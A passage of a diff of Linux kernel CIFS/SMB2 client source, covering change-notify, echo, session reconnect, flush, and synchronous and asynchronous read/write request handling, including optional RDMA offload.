+-SMB2_get_srv_num(const unsigned int xid, struct cifs_tcon *tcon,
+-		 u64 persistent_fid, u64 volatile_fid, __le64 *uniqueid)
+-{
+-	return query_info(xid, tcon, persistent_fid, volatile_fid,
+-			  FILE_INTERNAL_INFORMATION, SMB2_O_INFO_FILE, 0,
+-			  sizeof(struct smb2_file_internal_info),
+-			  sizeof(struct smb2_file_internal_info),
+-			  (void **)&uniqueid, NULL);
+-}
+-
+-/*
+- * CHANGE_NOTIFY Request is sent to get notifications on changes to a directory
+- * See MS-SMB2 2.2.35 and 2.2.36
+- */
+-
+-static int
+-SMB2_notify_init(const unsigned int xid, struct smb_rqst *rqst,
+-		 struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		 u64 persistent_fid, u64 volatile_fid,
+-		 u32 completion_filter, bool watch_tree)
+-{
+-	struct smb2_change_notify_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_CHANGE_NOTIFY, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	/* See note 354 of MS-SMB2, 64K max */
+-	req->OutputBufferLength =
+-		cpu_to_le32(SMB2_MAX_BUFFER_SIZE - MAX_SMB2_HDR_SIZE);
+-	req->CompletionFilter = cpu_to_le32(completion_filter);
+-	if (watch_tree)
+-		req->Flags = cpu_to_le16(SMB2_WATCH_TREE);
+-	else
+-		req->Flags = 0;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid, bool watch_tree,
+-		u32 completion_filter, u32 max_out_data_len, char **out_data,
+-		u32 *plen /* returned data len */)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	struct smb_rqst rqst;
+-	struct smb2_change_notify_rsp *smb_rsp;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov = {NULL, 0};
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int flags = 0;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "change notify\n");
+-	if (!ses || !server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	if (plen)
+-		*plen = 0;
+-
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = SMB2_notify_init(xid, &rqst, tcon, server,
+-			      persistent_fid, volatile_fid,
+-			      completion_filter, watch_tree);
+-	if (rc)
+-		goto cnotify_exit;
+-
+-	trace_smb3_notify_enter(xid, persistent_fid, tcon->tid, ses->Suid,
+-				(u8)watch_tree, completion_filter);
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_CHANGE_NOTIFY_HE);
+-		trace_smb3_notify_err(xid, persistent_fid, tcon->tid, ses->Suid,
+-				(u8)watch_tree, completion_filter, rc);
+-	} else {
+-		trace_smb3_notify_done(xid, persistent_fid, tcon->tid,
+-			ses->Suid, (u8)watch_tree, completion_filter);
+-		/* validate that notify information is plausible */
+-		if ((rsp_iov.iov_base == NULL) ||
+-		    (rsp_iov.iov_len < sizeof(struct smb2_change_notify_rsp)))
+-			goto cnotify_exit;
+-
+-		smb_rsp = (struct smb2_change_notify_rsp *)rsp_iov.iov_base;
+-
+-		smb2_validate_iov(le16_to_cpu(smb_rsp->OutputBufferOffset),
+-				le32_to_cpu(smb_rsp->OutputBufferLength), &rsp_iov,
+-				sizeof(struct file_notify_information));
+-
+-		*out_data = kmemdup((char *)smb_rsp + le16_to_cpu(smb_rsp->OutputBufferOffset),
+-				le32_to_cpu(smb_rsp->OutputBufferLength), GFP_KERNEL);
+-		if (*out_data == NULL) {
+-			rc = -ENOMEM;
+-			goto cnotify_exit;
+-		} else
+-			*plen = le32_to_cpu(smb_rsp->OutputBufferLength);
+-	}
+-
+- cnotify_exit:
+-	if (rqst.rq_iov)
+-		cifs_small_buf_release(rqst.rq_iov[0].iov_base); /* request */
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-
+-
+-/*
+- * This is a no-op for now. We're not really interested in the reply, but
+- * rather in the fact that the server sent one and that server->lstrp
+- * gets updated.
+- *
+- * FIXME: maybe we should consider checking that the reply matches request?
+- */
+-static void
+-smb2_echo_callback(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->callback_data;
+-	struct smb2_echo_rsp *rsp = (struct smb2_echo_rsp *)mid->resp_buf;
+-	struct cifs_credits credits = { .value = 0, .instance = 0 };
+-
+-	if (mid->mid_state == MID_RESPONSE_RECEIVED
+-	    || mid->mid_state == MID_RESPONSE_MALFORMED) {
+-		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-	}
+-
+-	release_mid(mid);
+-	add_credits(server, &credits, CIFS_ECHO_OP);
+-}
+-
+-void smb2_reconnect_server(struct work_struct *work)
+-{
+-	struct TCP_Server_Info *server = container_of(work,
+-					struct TCP_Server_Info, reconnect.work);
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses, *ses2;
+-	struct cifs_tcon *tcon, *tcon2;
+-	struct list_head tmp_list, tmp_ses_list;
+-	bool tcon_exist = false, ses_exist = false;
+-	bool tcon_selected = false;
+-	int rc;
+-	bool resched = false;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	/* Prevent simultaneous reconnects that can corrupt tcon->rlist list */
+-	mutex_lock(&pserver->reconnect_mutex);
+-
+-	INIT_LIST_HEAD(&tmp_list);
+-	INIT_LIST_HEAD(&tmp_ses_list);
+-	cifs_dbg(FYI, "Reconnecting tcons and channels\n");
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-
+-		tcon_selected = false;
+-
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			if (tcon->need_reconnect || tcon->need_reopen_files) {
+-				tcon->tc_count++;
+-				list_add_tail(&tcon->rlist, &tmp_list);
+-				tcon_selected = tcon_exist = true;
+-			}
+-		}
+-		/*
+-		 * IPC has the same lifetime as its session and uses its
+-		 * refcount.
+-		 */
+-		if (ses->tcon_ipc && ses->tcon_ipc->need_reconnect) {
+-			list_add_tail(&ses->tcon_ipc->rlist, &tmp_list);
+-			tcon_selected = tcon_exist = true;
+-			ses->ses_count++;
+-		}
+-		/*
+-		 * handle the case where a channel needs to reconnect its
+-		 * binding session, but the tcon is healthy (some other
+-		 * channel is active)
+-		 */
+-		spin_lock(&ses->chan_lock);
+-		if (!tcon_selected && cifs_chan_needs_reconnect(ses, server)) {
+-			list_add_tail(&ses->rlist, &tmp_ses_list);
+-			ses_exist = true;
+-			ses->ses_count++;
+-		}
+-		spin_unlock(&ses->chan_lock);
+-	}
+-	/*
+-	 * Get the reference to server struct to be sure that the last call of
+-	 * cifs_put_tcon() in the loop below won't release the server pointer.
+-	 */
+-	if (tcon_exist || ses_exist)
+-		server->srv_count++;
+-
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	list_for_each_entry_safe(tcon, tcon2, &tmp_list, rlist) {
+-		rc = smb2_reconnect(SMB2_INTERNAL_CMD, tcon, server);
+-		if (!rc)
+-			cifs_reopen_persistent_handles(tcon);
+-		else
+-			resched = true;
+-		list_del_init(&tcon->rlist);
+-		if (tcon->ipc)
+-			cifs_put_smb_ses(tcon->ses);
+-		else
+-			cifs_put_tcon(tcon);
+-	}
+-
+-	if (!ses_exist)
+-		goto done;
+-
+-	/* allocate a dummy tcon struct used for reconnect */
+-	tcon = tconInfoAlloc();
+-	if (!tcon) {
+-		resched = true;
+-		list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
+-			list_del_init(&ses->rlist);
+-			cifs_put_smb_ses(ses);
+-		}
+-		goto done;
+-	}
+-
+-	tcon->status = TID_GOOD;
+-	tcon->retry = false;
+-	tcon->need_reconnect = false;
+-
+-	/* now reconnect sessions for necessary channels */
+-	list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
+-		tcon->ses = ses;
+-		rc = smb2_reconnect(SMB2_INTERNAL_CMD, tcon, server);
+-		if (rc)
+-			resched = true;
+-		list_del_init(&ses->rlist);
+-		cifs_put_smb_ses(ses);
+-	}
+-	tconInfoFree(tcon);
+-
+-done:
+-	cifs_dbg(FYI, "Reconnecting tcons and channels finished\n");
+-	if (resched)
+-		queue_delayed_work(cifsiod_wq, &server->reconnect, 2 * HZ);
+-	mutex_unlock(&pserver->reconnect_mutex);
+-
+-	/* now we can safely release srv struct */
+-	if (tcon_exist || ses_exist)
+-		cifs_put_tcp_session(server, 1);
+-}
+-
+-int
+-SMB2_echo(struct TCP_Server_Info *server)
+-{
+-	struct smb2_echo_req *req;
+-	int rc = 0;
+-	struct kvec iov[1];
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = 1 };
+-	unsigned int total_len;
+-
+-	cifs_dbg(FYI, "In echo request for conn_id %lld\n", server->conn_id);
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->ops->need_neg &&
+-	    server->ops->need_neg(server)) {
+-		spin_unlock(&server->srv_lock);
+-		/* No need to send echo on newly established connections */
+-		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+-		return rc;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	rc = smb2_plain_req_init(SMB2_ECHO, NULL, server,
+-				 (void **)&req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->hdr.CreditRequest = cpu_to_le16(1);
+-
+-	iov[0].iov_len = total_len;
+-	iov[0].iov_base = (char *)req;
+-
+-	rc = cifs_call_async(server, &rqst, NULL, smb2_echo_callback, NULL,
+-			     server, CIFS_ECHO_OP, NULL);
+-	if (rc)
+-		cifs_dbg(FYI, "Echo request failed: %d\n", rc);
+-
+-	cifs_small_buf_release(req);
+-	return rc;
+-}
+-
+-void
+-SMB2_flush_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov)
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-}
+-
+-int
+-SMB2_flush_init(const unsigned int xid, struct smb_rqst *rqst,
+-		struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		u64 persistent_fid, u64 volatile_fid)
+-{
+-	struct smb2_flush_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_FLUSH, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+-	   u64 volatile_fid)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct smb_rqst rqst;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov = {NULL, 0};
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int flags = 0;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "flush\n");
+-	if (!ses || !(ses->server))
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = SMB2_flush_init(xid, &rqst, tcon, server,
+-			     persistent_fid, volatile_fid);
+-	if (rc)
+-		goto flush_exit;
+-
+-	trace_smb3_flush_enter(xid, persistent_fid, tcon->tid, ses->Suid);
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_FLUSH_HE);
+-		trace_smb3_flush_err(xid, persistent_fid, tcon->tid, ses->Suid,
+-				     rc);
+-	} else
+-		trace_smb3_flush_done(xid, persistent_fid, tcon->tid,
+-				      ses->Suid);
+-
+- flush_exit:
+-	SMB2_flush_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-static inline bool smb3_use_rdma_offload(struct cifs_io_parms *io_parms)
+-{
+-	struct TCP_Server_Info *server = io_parms->server;
+-	struct cifs_tcon *tcon = io_parms->tcon;
+-
+-	/* we can only offload if we're connected */
+-	if (!server || !tcon)
+-		return false;
+-
+-	/* we can only offload on an rdma connection */
+-	if (!server->rdma || !server->smbd_conn)
+-		return false;
+-
+-	/* we don't support signed offload yet */
+-	if (server->sign)
+-		return false;
+-
+-	/* we don't support encrypted offload yet */
+-	if (smb3_encryption_required(tcon))
+-		return false;
+-
+-	/* offload also has its overhead, so only do it if desired */
+-	if (io_parms->length < server->smbd_conn->rdma_readwrite_threshold)
+-		return false;
+-
+-	return true;
+-}
+-#endif /* CONFIG_CIFS_SMB_DIRECT */
+-
+-/*
+- * To form a chain of read requests, any read requests after the first should
+- * have the end_of_chain boolean set to true.
+- */
+-static int
+-smb2_new_read_req(void **buf, unsigned int *total_len,
+-	struct cifs_io_parms *io_parms, struct cifs_readdata *rdata,
+-	unsigned int remaining_bytes, int request_type)
+-{
+-	int rc = -EACCES;
+-	struct smb2_read_req *req = NULL;
+-	struct smb2_hdr *shdr;
+-	struct TCP_Server_Info *server = io_parms->server;
+-
+-	rc = smb2_plain_req_init(SMB2_READ, io_parms->tcon, server,
+-				 (void **) &req, total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (server == NULL)
+-		return -ECONNABORTED;
+-
+-	shdr = &req->hdr;
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+-
+-	req->PersistentFileId = io_parms->persistent_fid;
+-	req->VolatileFileId = io_parms->volatile_fid;
+-	req->ReadChannelInfoOffset = 0; /* reserved */
+-	req->ReadChannelInfoLength = 0; /* reserved */
+-	req->Channel = 0; /* reserved */
+-	req->MinimumCount = 0;
+-	req->Length = cpu_to_le32(io_parms->length);
+-	req->Offset = cpu_to_le64(io_parms->offset);
+-
+-	trace_smb3_read_enter(0 /* xid */,
+-			io_parms->persistent_fid,
+-			io_parms->tcon->tid, io_parms->tcon->ses->Suid,
+-			io_parms->offset, io_parms->length);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/*
+-	 * If we want to do an RDMA write, fill in and append
+-	 * smbd_buffer_descriptor_v1 to the end of read request
+-	 */
+-	if (smb3_use_rdma_offload(io_parms)) {
+-		struct smbd_buffer_descriptor_v1 *v1;
+-		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+-
+-		rdata->mr = smbd_register_mr(
+-				server->smbd_conn, rdata->pages,
+-				rdata->nr_pages, rdata->page_offset,
+-				rdata->tailsz, true, need_invalidate);
+-		if (!rdata->mr)
+-			return -EAGAIN;
+-
+-		req->Channel = SMB2_CHANNEL_RDMA_V1_INVALIDATE;
+-		if (need_invalidate)
+-			req->Channel = SMB2_CHANNEL_RDMA_V1;
+-		req->ReadChannelInfoOffset =
+-			cpu_to_le16(offsetof(struct smb2_read_req, Buffer));
+-		req->ReadChannelInfoLength =
+-			cpu_to_le16(sizeof(struct smbd_buffer_descriptor_v1));
+-		v1 = (struct smbd_buffer_descriptor_v1 *) &req->Buffer[0];
+-		v1->offset = cpu_to_le64(rdata->mr->mr->iova);
+-		v1->token = cpu_to_le32(rdata->mr->mr->rkey);
+-		v1->length = cpu_to_le32(rdata->mr->mr->length);
+-
+-		*total_len += sizeof(*v1) - 1;
+-	}
+-#endif
+-	if (request_type & CHAINED_REQUEST) {
+-		if (!(request_type & END_OF_CHAIN)) {
+-			/* next 8-byte aligned request */
+-			*total_len = ALIGN(*total_len, 8);
+-			shdr->NextCommand = cpu_to_le32(*total_len);
+-		} else /* END_OF_CHAIN */
+-			shdr->NextCommand = 0;
+-		if (request_type & RELATED_REQUEST) {
+-			shdr->Flags |= SMB2_FLAGS_RELATED_OPERATIONS;
+-			/*
+-			 * Related requests use info from the previous read
+-			 * request in the chain.
+-			 */
+-			shdr->SessionId = cpu_to_le64(0xFFFFFFFFFFFFFFFF);
+-			shdr->Id.SyncId.TreeId = cpu_to_le32(0xFFFFFFFF);
+-			req->PersistentFileId = (u64)-1;
+-			req->VolatileFileId = (u64)-1;
+-		}
+-	}
+-	if (remaining_bytes > io_parms->length)
+-		req->RemainingBytes = cpu_to_le32(remaining_bytes);
+-	else
+-		req->RemainingBytes = 0;
+-
+-	*buf = req;
+-	return rc;
+-}
+-
+-static void
+-smb2_readv_callback(struct mid_q_entry *mid)
+-{
+-	struct cifs_readdata *rdata = mid->callback_data;
+-	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+-	struct TCP_Server_Info *server = rdata->server;
+-	struct smb2_hdr *shdr =
+-				(struct smb2_hdr *)rdata->iov[0].iov_base;
+-	struct cifs_credits credits = { .value = 0, .instance = 0 };
+-	struct smb_rqst rqst = { .rq_iov = &rdata->iov[1],
+-				 .rq_nvec = 1, };
+-
+-	if (rdata->got_bytes) {
+-		rqst.rq_pages = rdata->pages;
+-		rqst.rq_offset = rdata->page_offset;
+-		rqst.rq_npages = rdata->nr_pages;
+-		rqst.rq_pagesz = rdata->pagesz;
+-		rqst.rq_tailsz = rdata->tailsz;
+-	}
+-
+-	WARN_ONCE(rdata->server != mid->server,
+-		  "rdata server %p != mid server %p",
+-		  rdata->server, mid->server);
+-
+-	cifs_dbg(FYI, "%s: mid=%llu state=%d result=%d bytes=%u\n",
+-		 __func__, mid->mid, mid->mid_state, rdata->result,
+-		 rdata->bytes);
+-
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		credits.value = le16_to_cpu(shdr->CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-		/* result already set, check signature */
+-		if (server->sign && !mid->decrypted) {
+-			int rc;
+-
+-			rc = smb2_verify_signature(&rqst, server);
+-			if (rc)
+-				cifs_tcon_dbg(VFS, "SMB signature verification returned error = %d\n",
+-					 rc);
+-		}
+-		/* FIXME: should this be counted toward the initiating task? */
+-		task_io_account_read(rdata->got_bytes);
+-		cifs_stats_bytes_read(tcon, rdata->got_bytes);
+-		break;
+-	case MID_REQUEST_SUBMITTED:
+-	case MID_RETRY_NEEDED:
+-		rdata->result = -EAGAIN;
+-		if (server->sign && rdata->got_bytes)
+-			/* reset the byte count since we cannot verify the signature */
+-			rdata->got_bytes = 0;
+-		/* FIXME: should this be counted toward the initiating task? */
+-		task_io_account_read(rdata->got_bytes);
+-		cifs_stats_bytes_read(tcon, rdata->got_bytes);
+-		break;
+-	case MID_RESPONSE_MALFORMED:
+-		credits.value = le16_to_cpu(shdr->CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-		fallthrough;
+-	default:
+-		rdata->result = -EIO;
+-	}
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/*
+-	 * If this rdata has a memory region registered, the MR can be freed.
+-	 * The MR needs to be freed as soon as I/O finishes to prevent deadlock,
+-	 * because MRs are limited in number and are used for future I/Os.
+-	 */
+-	if (rdata->mr) {
+-		smbd_deregister_mr(rdata->mr);
+-		rdata->mr = NULL;
+-	}
+-#endif
+-	if (rdata->result && rdata->result != -ENODATA) {
+-		cifs_stats_fail_inc(tcon, SMB2_READ_HE);
+-		trace_smb3_read_err(0 /* xid */,
+-				    rdata->cfile->fid.persistent_fid,
+-				    tcon->tid, tcon->ses->Suid, rdata->offset,
+-				    rdata->bytes, rdata->result);
+-	} else
+-		trace_smb3_read_done(0 /* xid */,
+-				     rdata->cfile->fid.persistent_fid,
+-				     tcon->tid, tcon->ses->Suid,
+-				     rdata->offset, rdata->got_bytes);
+-
+-	queue_work(cifsiod_wq, &rdata->work);
+-	release_mid(mid);
+-	add_credits(server, &credits, 0);
+-}
+-
+-/* smb2_async_readv - send an async read, and set up mid to handle result */
+-int
+-smb2_async_readv(struct cifs_readdata *rdata)
+-{
+-	int rc, flags = 0;
+-	char *buf;
+-	struct smb2_hdr *shdr;
+-	struct cifs_io_parms io_parms;
+-	struct smb_rqst rqst = { .rq_iov = rdata->iov,
+-				 .rq_nvec = 1 };
+-	struct TCP_Server_Info *server;
+-	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+-	unsigned int total_len;
+-
+-	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
+-		 __func__, rdata->offset, rdata->bytes);
+-
+-	if (!rdata->server)
+-		rdata->server = cifs_pick_channel(tcon->ses);
+-
+-	io_parms.tcon = tlink_tcon(rdata->cfile->tlink);
+-	io_parms.server = server = rdata->server;
+-	io_parms.offset = rdata->offset;
+-	io_parms.length = rdata->bytes;
+-	io_parms.persistent_fid = rdata->cfile->fid.persistent_fid;
+-	io_parms.volatile_fid = rdata->cfile->fid.volatile_fid;
+-	io_parms.pid = rdata->pid;
+-
+-	rc = smb2_new_read_req(
+-		(void **) &buf, &total_len, &io_parms, rdata, 0, 0);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(io_parms.tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	rdata->iov[0].iov_base = buf;
+-	rdata->iov[0].iov_len = total_len;
+-
+-	shdr = (struct smb2_hdr *)buf;
+-
+-	if (rdata->credits.value > 0) {
+-		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(rdata->bytes,
+-						SMB2_MAX_BUFFER_SIZE));
+-		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
+-
+-		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+-		if (rc)
+-			goto async_readv_out;
+-
+-		flags |= CIFS_HAS_CREDITS;
+-	}
+-
+-	kref_get(&rdata->refcount);
+-	rc = cifs_call_async(server, &rqst,
+-			     cifs_readv_receive, smb2_readv_callback,
+-			     smb3_handle_read_data, rdata, flags,
+-			     &rdata->credits);
+-	if (rc) {
+-		kref_put(&rdata->refcount, cifs_readdata_release);
+-		cifs_stats_fail_inc(io_parms.tcon, SMB2_READ_HE);
+-		trace_smb3_read_err(0 /* xid */, io_parms.persistent_fid,
+-				    io_parms.tcon->tid,
+-				    io_parms.tcon->ses->Suid,
+-				    io_parms.offset, io_parms.length, rc);
+-	}
+-
+-async_readv_out:
+-	cifs_small_buf_release(buf);
+-	return rc;
+-}
+-
+-int
+-SMB2_read(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	  unsigned int *nbytes, char **buf, int *buf_type)
+-{
+-	struct smb_rqst rqst;
+-	int resp_buftype, rc;
+-	struct smb2_read_req *req = NULL;
+-	struct smb2_read_rsp *rsp = NULL;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	unsigned int total_len;
+-	int flags = CIFS_LOG_ERROR;
+-	struct cifs_ses *ses = io_parms->tcon->ses;
+-
+-	if (!io_parms->server)
+-		io_parms->server = cifs_pick_channel(io_parms->tcon->ses);
+-
+-	*nbytes = 0;
+-	rc = smb2_new_read_req((void **)&req, &total_len, io_parms, NULL, 0, 0);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(io_parms->tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, io_parms->server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_read_rsp *)rsp_iov.iov_base;
+-
+-	if (rc) {
+-		if (rc != -ENODATA) {
+-			cifs_stats_fail_inc(io_parms->tcon, SMB2_READ_HE);
+-			cifs_dbg(VFS, "Send error in read = %d\n", rc);
+-			trace_smb3_read_err(xid,
+-					    req->PersistentFileId,
+-					    io_parms->tcon->tid, ses->Suid,
+-					    io_parms->offset, io_parms->length,
+-					    rc);
+-		} else
+-			trace_smb3_read_done(xid, req->PersistentFileId, io_parms->tcon->tid,
+-					     ses->Suid, io_parms->offset, 0);
+-		free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-		cifs_small_buf_release(req);
+-		return rc == -ENODATA ? 0 : rc;
+-	} else
+-		trace_smb3_read_done(xid,
+-				    req->PersistentFileId,
+-				    io_parms->tcon->tid, ses->Suid,
+-				    io_parms->offset, io_parms->length);
+-
+-	cifs_small_buf_release(req);
+-
+-	*nbytes = le32_to_cpu(rsp->DataLength);
+-	if ((*nbytes > CIFS_MAX_MSGSIZE) ||
+-	    (*nbytes > io_parms->length)) {
+-		cifs_dbg(FYI, "bad length %d for count %d\n",
+-			 *nbytes, io_parms->length);
+-		rc = -EIO;
+-		*nbytes = 0;
+-	}
+-
+-	if (*buf) {
+-		memcpy(*buf, (char *)rsp + rsp->DataOffset, *nbytes);
+-		free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	} else if (resp_buftype != CIFS_NO_BUFFER) {
+-		*buf = rsp_iov.iov_base;
+-		if (resp_buftype == CIFS_SMALL_BUFFER)
+-			*buf_type = CIFS_SMALL_BUFFER;
+-		else if (resp_buftype == CIFS_LARGE_BUFFER)
+-			*buf_type = CIFS_LARGE_BUFFER;
+-	}
+-	return rc;
+-}
+-
+-/*
+- * Check the mid_state and signature on received buffer (if any), and queue the
+- * workqueue completion task.
+- */
+-static void
+-smb2_writev_callback(struct mid_q_entry *mid)
+-{
+-	struct cifs_writedata *wdata = mid->callback_data;
+-	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
+-	struct TCP_Server_Info *server = wdata->server;
+-	unsigned int written;
+-	struct smb2_write_rsp *rsp = (struct smb2_write_rsp *)mid->resp_buf;
+-	struct cifs_credits credits = { .value = 0, .instance = 0 };
+-
+-	WARN_ONCE(wdata->server != mid->server,
+-		  "wdata server %p != mid server %p",
+-		  wdata->server, mid->server);
+-
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-		wdata->result = smb2_check_receive(mid, server, 0);
+-		if (wdata->result != 0)
+-			break;
+-
+-		written = le32_to_cpu(rsp->DataLength);
+-		/*
+-		 * Mask off high 16 bits when bytes written as returned
+-		 * by the server is greater than bytes requested by the
+-		 * client. OS/2 servers are known to set incorrect
+-		 * CountHigh values.
+-		 */
+-		if (written > wdata->bytes)
+-			written &= 0xFFFF;
+-
+-		if (written < wdata->bytes)
+-			wdata->result = -ENOSPC;
+-		else
+-			wdata->bytes = written;
+-		break;
+-	case MID_REQUEST_SUBMITTED:
+-	case MID_RETRY_NEEDED:
+-		wdata->result = -EAGAIN;
+-		break;
+-	case MID_RESPONSE_MALFORMED:
+-		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-		fallthrough;
+-	default:
+-		wdata->result = -EIO;
+-		break;
+-	}
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/*
+-	 * If this wdata has a memory region registered, the MR can be freed.
+-	 * The number of MRs available is limited, so it is important to recover
+-	 * a used MR as soon as I/O finishes; holding an MR through later I/O
+-	 * can result in I/O deadlock due to a lack of MRs with which to send
+-	 * requests on I/O retry.
+-	 */
+-	if (wdata->mr) {
+-		smbd_deregister_mr(wdata->mr);
+-		wdata->mr = NULL;
+-	}
+-#endif
+-	if (wdata->result) {
+-		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
+-		trace_smb3_write_err(0 /* no xid */,
+-				     wdata->cfile->fid.persistent_fid,
+-				     tcon->tid, tcon->ses->Suid, wdata->offset,
+-				     wdata->bytes, wdata->result);
+-		if (wdata->result == -ENOSPC)
+-			pr_warn_once("Out of space writing to %s\n",
+-				     tcon->tree_name);
+-	} else
+-		trace_smb3_write_done(0 /* no xid */,
+-				      wdata->cfile->fid.persistent_fid,
+-				      tcon->tid, tcon->ses->Suid,
+-				      wdata->offset, wdata->bytes);
+-
+-	queue_work(cifsiod_wq, &wdata->work);
+-	release_mid(mid);
+-	add_credits(server, &credits, 0);
+-}
+-
+-/* smb2_async_writev - send an async write, and set up mid to handle result */
+-int
+-smb2_async_writev(struct cifs_writedata *wdata,
+-		  void (*release)(struct kref *kref))
+-{
+-	int rc = -EACCES, flags = 0;
+-	struct smb2_write_req *req = NULL;
+-	struct smb2_hdr *shdr;
+-	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
+-	struct TCP_Server_Info *server = wdata->server;
+-	struct kvec iov[1];
+-	struct smb_rqst rqst = { };
+-	unsigned int total_len;
+-	struct cifs_io_parms _io_parms;
+-	struct cifs_io_parms *io_parms = NULL;
+-
+-	if (!wdata->server)
+-		server = wdata->server = cifs_pick_channel(tcon->ses);
+-
+-	/*
+-	 * in future we may get cifs_io_parms passed in from the caller,
+-	 * but for now we construct it here...
+-	 */
